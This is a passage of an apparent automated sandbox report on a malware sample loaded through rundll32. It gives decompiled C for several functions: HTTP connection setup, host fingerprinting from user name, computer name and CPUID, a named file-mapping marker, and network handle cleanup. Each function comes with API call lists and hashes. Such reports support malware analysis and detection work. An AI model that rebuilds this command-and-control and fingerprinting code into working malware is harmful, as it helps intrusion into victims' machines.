                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 044454C6
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,044466F1,?), ref: 044454E1
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,044466F1,?,00000000), ref: 04445588
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044466F1,?,00000000,?,?), ref: 04445598
                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 044455D2
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 044455EC
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 044455F8
                      • Part of subcall function 04443399: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F493D8,00000000,?,74E5F710,00000000,74E5F730), ref: 044433E8
                      • Part of subcall function 04443399: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F49410,?,00000000,30314549,00000014,004F0053,04F493CC), ref: 04443485
                      • Part of subcall function 04443399: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044454F9), ref: 04443497
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044466F1,?,00000000,?,?), ref: 0444560B
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                    • String ID: Ut
                    • API String ID: 3521023985-8415677
                    • Opcode ID: f20d1c06fd3712e930cd2ecf488b25712623e2f511adf7c039e3e9b1fc5651a9
                    • Instruction ID: c403773d51c597f7c489b734cef123c08fab9e91a3ec630294b8073803f70ea7
                    • Opcode Fuzzy Hash: f20d1c06fd3712e930cd2ecf488b25712623e2f511adf7c039e3e9b1fc5651a9
                    • Instruction Fuzzy Hash: 36517AB5508320BFFF109F15DC449ABBBE9EBC4764F104A1AF5A492290D774E944CFA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04447A34 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E04447A34(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				int _t53;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E044463FD(__eax + __eax + 1);
				if(_t56 != 0) {
					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
					if(_t53 == 0) {
						E044417AB(_t56);
					} else {
						E044417AB( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E044479C9) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E04445867( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x444a320; // 0xafd5a8
						_t15 = _t59 + 0x444b743; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65);
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}















                    0x04447a34
                    0x04447a34
                    0x04447a3f
                    0x04447a46
                    0x04447a4e
                    0x04447a58
                    0x04447a5e
                    0x04447a69
                    0x04447a71
                    0x04447a81
                    0x04447a73
                    0x04447a76
                    0x04447a7b
                    0x04447a7b
                    0x04447a71
                    0x04447a91
                    0x04447a99
                    0x04447a9c
                    0x04447b85
                    0x00000000
                    0x04447ab7
                    0x04447aba
                    0x04447acd
                    0x04447ad5
                    0x04447ad8
                    0x04447b00
                    0x04447b13
                    0x04447b1d
                    0x04447b20
                    0x04447b28
                    0x04447b2b
                    0x00000000
                    0x00000000
                    0x04447b2f
                    0x04447b3b
                    0x04447b4c
                    0x04447b4e
                    0x04447b5f
                    0x04447b5f
                    0x04447b6f
                    0x00000000
                    0x04447b81
                    0x00000000
                    0x04447b81
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04447ad8

                    APIs
                    • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 04447A46
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04447A69
                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04447A91
                    • InternetSetStatusCallback.WININET(00000000,044479C9), ref: 04447AA8
                    • ResetEvent.KERNEL32(?), ref: 04447ABA
                    • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04447ACD
                    • GetLastError.KERNEL32 ref: 04447ADA
                    • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04447B20
                    • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04447B3E
                    • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04447B5F
                    • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04447B6B
                    • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04447B7B
                    • GetLastError.KERNEL32 ref: 04447B85
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                    • String ID:
                    • API String ID: 2290446683-0
                    • Opcode ID: c03671a4f52eb684bab4647bdcfeb7c2544d011f6792037382d75199f76d9a97
                    • Instruction ID: 11934ccea9e4fb2295761fdde99c3e9a83ec9902fac42f3cc89477a5e1a6342b
                    • Opcode Fuzzy Hash: c03671a4f52eb684bab4647bdcfeb7c2544d011f6792037382d75199f76d9a97
                    • Instruction Fuzzy Hash: 49417C75500644BBFB319FA5DC89EABBBBDEFC5704F10492AF102E1191E738A945DB20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04447E75 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 189 4447e75-4447eda 190 4447edc-4447ef6 RaiseException 189->190 191 4447efb-4447f25 189->191 192 44480ab-44480af 190->192 193 4447f27 191->193 194 4447f2a-4447f36 191->194 193->194 195 4447f38-4447f43 194->195 196 4447f49-4447f4b 194->196 195->196 204 444808e-4448095 195->204 197 4447f51-4447f58 196->197 198 4447ff3-4447ffd 196->198 202 4447f68-4447f75 LoadLibraryA 197->202 203 4447f5a-4447f66 197->203 200 4447fff-4448007 198->200 201 4448009-444800b 198->201 200->201 205 444800d-4448010 201->205 206 4448089-444808c 201->206 207 4447f77-4447f87 GetLastError 202->207 208 4447fb8-4447fc4 InterlockedExchange 202->208 203->202 203->208 210 4448097-44480a4 204->210 211 44480a9 204->211 213 4448012-4448015 205->213 214 444803e-444804c GetProcAddress 205->214 206->204 215 4447f97-4447fb3 RaiseException 207->215 216 4447f89-4447f95 207->216 217 4447fc6-4447fca 208->217 218 4447fec-4447fed FreeLibrary 208->218 210->211 211->192 213->214 219 4448017-4448022 213->219 214->206 220 444804e-444805e GetLastError 214->220 215->192 216->208 216->215 217->198 221 4447fcc-4447fd8 LocalAlloc 217->221 218->198 219->214 223 4448024-444802a 219->223 225 4448060-4448068 220->225 226 444806a-444806c 220->226 221->198 222 4447fda-4447fea 221->222 222->198 223->214 228 444802c-444802f 223->228 225->226 226->206 227 444806e-4448086 RaiseException 226->227 227->206 228->214 230 4448031-444803c 228->230 230->206 230->214
                    C-Code - Quality: 51%
                    			E04447E75(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4440000;
				_t115 = _t139[3] + 0x4440000;
				_t131 = _t139[4] + 0x4440000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4440000;
				_v16 = _t139[5] + 0x4440000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4440002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x444a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x444a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x444a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x444a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x444a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x444a1b8; // 0x0
										 *_t102 = _t125;
										 *0x444a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x444a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                    0x04447e84
                    0x04447e9a
                    0x04447ea0
                    0x04447ea2
                    0x04447ea7
                    0x04447ead
                    0x04447eb2
                    0x04447eb5
                    0x04447ec3
                    0x04447eca
                    0x04447ecd
                    0x04447ed0
                    0x04447ed1
                    0x04447ed4
                    0x04447ed7
                    0x04447eda
                    0x04447edf
                    0x04447eee
                    0x00000000
                    0x04447ef4
                    0x04447efe
                    0x04447f08
                    0x04447f0d
                    0x04447f0f
                    0x04447f19
                    0x04447f1c
                    0x04447f1f
                    0x04447f25
                    0x04447f27
                    0x04447f27
                    0x04447f2a
                    0x04447f2d
                    0x04447f32
                    0x04447f36
                    0x04447f49
                    0x04447f4b
                    0x04447ff3
                    0x04447ff3
                    0x04447ffa
                    0x04447ffd
                    0x04448007
                    0x04448007
                    0x0444800b
                    0x04448089
                    0x0444808c
                    0x0444808e
                    0x0444808e
                    0x04448095
                    0x04448097
                    0x044480a1
                    0x044480a4
                    0x044480a7
                    0x044480a7
                    0x00000000
                    0x0444800d
                    0x04448010
                    0x0444803e
                    0x04448048
                    0x0444804c
                    0x04448054
                    0x04448057
                    0x0444805e
                    0x04448068
                    0x04448068
                    0x0444806c
                    0x04448071
                    0x04448080
                    0x04448086
                    0x04448086
                    0x0444806c
                    0x00000000
                    0x04448017
                    0x0444801a
                    0x04448022
                    0x04448037
                    0x0444803c
                    0x00000000
                    0x00000000
                    0x0444803c
                    0x00000000
                    0x04448022
                    0x04448010
                    0x0444800b
                    0x04447f51
                    0x04447f58
                    0x04447f68
                    0x04447f6b
                    0x04447f71
                    0x04447f75
                    0x04447fb8
                    0x04447fc4
                    0x04447fed
                    0x04447fc6
                    0x04447fca
                    0x04447fd0
                    0x04447fd8
                    0x04447fda
                    0x04447fdd
                    0x04447fe3
                    0x04447fe5
                    0x04447fe5
                    0x04447fd8
                    0x04447fca
                    0x00000000
                    0x04447fc4
                    0x04447f7d
                    0x04447f80
                    0x04447f87
                    0x04447f97
                    0x04447f9a
                    0x04447faa
                    0x00000000
                    0x04447fb0
                    0x04447f91
                    0x04447f95
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04447f95
                    0x04447f62
                    0x04447f66
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04447f66
                    0x04447f3f
                    0x04447f43
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04447EEE
                    • LoadLibraryA.KERNEL32(?), ref: 04447F6B
                    • GetLastError.KERNEL32 ref: 04447F77
                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04447FAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                    • String ID: $
                    • API String ID: 948315288-3993045852
                    • Opcode ID: a21c03958c6aa8e204193650e7c3076051f456d93cd29217643d8b6932fca305
                    • Instruction ID: 09e570da70c3c0efc570891ed67381d63c0016a7675679100d5b75f88e3d6b27
                    • Opcode Fuzzy Hash: a21c03958c6aa8e204193650e7c3076051f456d93cd29217643d8b6932fca305
                    • Instruction Fuzzy Hash: 37814275A006059FEF21DFA8D880A9EB7F5FF88310F15812AE505E7340EB74E945CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044421BC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 44421bc-44421d0 232 44421d2-44421d7 231->232 233 44421da-44421ec call 4445894 231->233 232->233 236 4442240-444224d 233->236 237 44421ee-44421fe GetUserNameW 233->237 238 444224f-4442266 GetComputerNameW 236->238 237->238 239 4442200-4442210 RtlAllocateHeap 237->239 240 44422a4-44422c6 238->240 241 4442268-4442279 RtlAllocateHeap 238->241 239->238 242 4442212-444221f GetUserNameW 239->242 241->240 243 444227b-4442284 GetComputerNameW 241->243 244 4442221-444222d call 44452a9 242->244 245 444222f-444223e 242->245 246 4442295-4442298 243->246 247 4442286-4442292 call 44452a9 243->247 244->245 245->238 246->240 247->246
                    C-Code - Quality: 96%
                    			E044421BC(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x444a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04445894( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x444a31c ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x444a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E044452A9(_v8 + _v8, _t63);
							}
							HeapFree( *0x444a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x444a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E044452A9(_v8 + _v8, _t63);
						}
						HeapFree( *0x444a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                    0x044421bc
                    0x044421c4
                    0x044421ca
                    0x044421cd
                    0x044421d0
                    0x044421d2
                    0x044421d7
                    0x044421d7
                    0x044421dd
                    0x044421df
                    0x044421ec
                    0x0444224d
                    0x044421ee
                    0x044421f3
                    0x044421f9
                    0x044421fe
                    0x0444220c
                    0x04442210
                    0x0444221f
                    0x04442226
                    0x0444222d
                    0x0444222d
                    0x04442238
                    0x04442238
                    0x04442210
                    0x044421fe
                    0x0444224f
                    0x04442255
                    0x0444225f
                    0x04442261
                    0x04442266
                    0x04442275
                    0x04442279
                    0x04442284
                    0x0444228b
                    0x04442292
                    0x04442292
                    0x0444229e
                    0x0444229e
                    0x04442279
                    0x044422a7
                    0x044422a9
                    0x044422ac
                    0x044422ae
                    0x044422b1
                    0x044422b4
                    0x044422be
                    0x044422c2
                    0x044422c6

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 044421F3
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 0444220A
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04442217
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04442238
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0444225F
                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04442273
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04442280
                    • HeapFree.KERNEL32(00000000,00000000), ref: 0444229E
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: HeapName$AllocateComputerFreeUser
                    • String ID: Ut
                    • API String ID: 3239747167-8415677
                    • Opcode ID: 2bc87585f0d91027e87e9e4c4d9e8524cedefaa5e7fa73c9e818b63b7a7ddeb4
                    • Instruction ID: 893767bd8158f273a96c5ca2921509fafd0a7d9d21583e7ebeff425e6c42d01c
                    • Opcode Fuzzy Hash: 2bc87585f0d91027e87e9e4c4d9e8524cedefaa5e7fa73c9e818b63b7a7ddeb4
                    • Instruction Fuzzy Hash: C0312475A00209EFEB10DFA9DC81A6EF7F9FB88350F10446AE505E3650EB74EE45AB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444414A Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 74%
                    			E0444414A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04448184();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x444a320; // 0xafd5a8
				_t5 = _t13 + 0x444b87e; // 0x4f48e26
				_t6 = _t13 + 0x444b59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04447DEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x444a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                    0x0444414a
                    0x04444152
                    0x04444156
                    0x0444415c
                    0x04444161
                    0x04444166
                    0x04444169
                    0x0444416c
                    0x04444171
                    0x04444172
                    0x04444175
                    0x0444417a
                    0x04444181
                    0x0444418b
                    0x0444418d
                    0x0444418e
                    0x04444191
                    0x044441ad
                    0x044441b3
                    0x044441b7
                    0x04444205
                    0x044441b9
                    0x044441c6
                    0x044441d6
                    0x044441de
                    0x044441f0
                    0x044441f4
                    0x00000000
                    0x00000000
                    0x044441e0
                    0x044441e3
                    0x044441e8
                    0x044441ea
                    0x044441ea
                    0x044441c8
                    0x044441ca
                    0x044441f6
                    0x044441f7
                    0x044441f7
                    0x044441c6
                    0x0444420c

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,044465C3,?,?,4D283A53,?,?), ref: 04444156
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0444416C
                    • _snwprintf.NTDLL ref: 04444191
                    • CreateFileMappingW.KERNELBASE(000000FF,0444A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 044441AD
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044465C3,?,?,4D283A53,?), ref: 044441BF
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 044441D6
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,044465C3,?,?,4D283A53), ref: 044441F7
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044465C3,?,?,4D283A53,?), ref: 044441FF
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID:
                    • API String ID: 1814172918-0
                    • Opcode ID: 766199c23f02842cdc30013b59085564dc162b598661e2a661b826977cfb6625
                    • Instruction ID: 6caa28c3c2a5667cc0bd5b55a02f01cffa90e4397b6d02452d4f65c98851d879
                    • Opcode Fuzzy Hash: 766199c23f02842cdc30013b59085564dc162b598661e2a661b826977cfb6625
                    • Instruction Fuzzy Hash: F621A2B6640214BBFB21AB64CC05F9B77B9EBC8754F240126FA05E7280EB70E906DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04445622 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 93%
                    			E04445622(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E04445867(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E044417AB(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E044417AB(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E044417AB(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E044417AB(_t46);
				}
				return _t24;
			}












                    0x04445622
                    0x04445622
                    0x04445624
                    0x04445626
                    0x0444562d
                    0x04445634
                    0x04445634
                    0x04445639
                    0x0444563e
                    0x04445645
